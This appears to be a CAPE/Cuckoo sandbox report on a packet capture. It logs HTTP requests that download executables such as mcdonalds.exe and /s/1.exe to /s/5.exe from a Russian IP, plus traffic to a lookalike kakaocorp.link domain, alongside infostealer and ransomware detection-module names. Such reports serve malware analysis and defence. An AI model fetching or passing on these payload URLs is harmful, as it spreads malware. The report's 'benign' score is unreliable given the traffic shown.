Analysis

Category Package Started Completed Duration
PCAP 2019-01-24 01:51:17 2019-01-24 01:51:17 0 seconds


MalScore

0.0

Benign


Signatures

No signatures

Hosts

Direct IP Country Name
Y 92.63.197.153 [VT] Russian Federation
N 138.201.162.99 [VT] Germany
Y ff02::1:2 [VT] unknown
Y ff02::1:3 [VT] unknown

DNS

Name Response Post-Analysis Lookup
www.kakaocorp.link [VT] A 138.201.162.99 [VT]

TCP

Source Source Port Destination Destination Port
192.168.100.130 49458 138.201.162.99 www.kakaocorp.link 80
192.168.100.130 49460 138.201.162.99 www.kakaocorp.link 443
192.168.100.130 49180 92.63.197.153 80
192.168.100.130 49317 92.63.197.153 80
192.168.100.130 49321 92.63.197.153 80
192.168.100.130 49329 92.63.197.153 80

UDP

Source Source Port Destination Destination Port
fe80::a179:b3ff:199:2314 62906 ff02::1:3 5355
fe80::a179:b3ff:199:2314 58708 ff02::1:3 5355
fe80::a179:b3ff:199:2314 546 ff02::1:2 547
fe80::a179:b3ff:199:2314 54603 ff02::1:3 5355
fe80::a179:b3ff:199:2314 51017 ff02::1:3 5355
fe80::a179:b3ff:199:2314 56067 ff02::1:3 5355
fe80::a179:b3ff:199:2314 55538 ff02::1:3 5355
192.168.100.130 56685 192.168.100.2 53
192.168.100.130 137 192.168.100.255 137
192.168.100.130 138 192.168.100.255 138
192.168.100.130 49962 224.0.0.252 5355
192.168.100.130 55357 224.0.0.252 5355
192.168.100.130 55764 224.0.0.252 5355
192.168.100.130 59227 224.0.0.252 5355
192.168.100.130 59502 224.0.0.252 5355
192.168.100.130 62425 224.0.0.252 5355
192.168.100.130 63232 239.255.255.250 1900

HTTP Requests

URI Data
http://92.63.197.153/mcdonalds.exe
GET /mcdonalds.exe HTTP/1.1
User-Agent: Windows
Host: 92.63.197.153
Connection: Keep-Alive

http://92.63.197.153/s/1.exe
GET /s/1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.153

http://92.63.197.153/s/2.exe
GET /s/2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.153

http://92.63.197.153/s/3.exe
GET /s/3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.153

http://92.63.197.153/s/4.exe
GET /s/4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.153

http://92.63.197.153/s/5.exe
GET /s/5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.153

http://www.kakaocorp.link/
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.kakaocorp.link
Cache-Control: no-cache

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.100.130 49460 138.201.162.99 www.kakaocorp.link 443 1d095e68489d3c535297cd8dffb06cb9 Non-Specific Microsoft Socket, Malware Test FP: brazil-malspam-pushes-banload, dhl-malspam-traffic, post-infection-traffic-from-terror-ek-payload, contract-malspam-traffic, cryptowall-traffic, fake-font-update-for-chrome, phishing-malware-run-on-vm, fiesta-ek-post-infection-and-click-fraud-traffic, phishing-malware-sandbox-analysis, angler-ek-traffic, goon-ek-traffic, magnitude-ek-traffic, brazil-malspam-solicitacao-de-orcamento-traffic-example, cryptowall-infection-on-vm, nuclear-ek-traffic, zeus-panda-banker-malspam-traffic, traffic-analysis-pop-quiz, netflix-phishing-traffic, malspam-pushing-remcosrat, sweet-orange-ek-traffic, brazil-malspam-traffic, eitest-hoelflertext-popup-sends-netsupport-manager-rat, eitest-hoeflertext-popup-sends-netsupport-rat, th-run-seamless-rig-ek-sends-ramnit-with-post-infection-traffic, nuclear-ek-from-my-infected-vm, fake-nf-e-malspam-traffic, fake-netflix-login-page-traffic-1st-run, payment-slip-malspam-traffic, rig-ek-traffic, malspam-pushing-smoke-loader, brazil-malspam-traffic-example, smoke-loader-traffic, phishing-malware-run-in-a-vm, boleto-malspam-traffic, infinity-ek-traffic
Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.

Processing ( 0.379 seconds )

  • 0.37 NetworkAnalysis
  • 0.007 AnalysisInfo
  • 0.001 BehaviorAnalysis
  • 0.001 Debug

Signatures ( 0.041 seconds )

  • 0.007 antiav_detectreg
  • 0.004 ransomware_files
  • 0.003 persistence_autorun
  • 0.003 antiav_detectfile
  • 0.003 infostealer_ftp
  • 0.003 ransomware_extensions
  • 0.002 browser_security
  • 0.002 infostealer_bitcoin
  • 0.002 infostealer_im
  • 0.001 tinba_behavior
  • 0.001 rat_nanocore
  • 0.001 cerber_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antianalysis_detectreg
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 disables_browser_warn
  • 0.001 infostealer_mail
  • 0.001 ie_martian_children
  • 0.001 network_torgateway

Reporting ( 0.0 seconds )

Task ID 32045
Mongo ID 5c491a18f28488081186bc5d
Cuckoo release 1.3-CAPE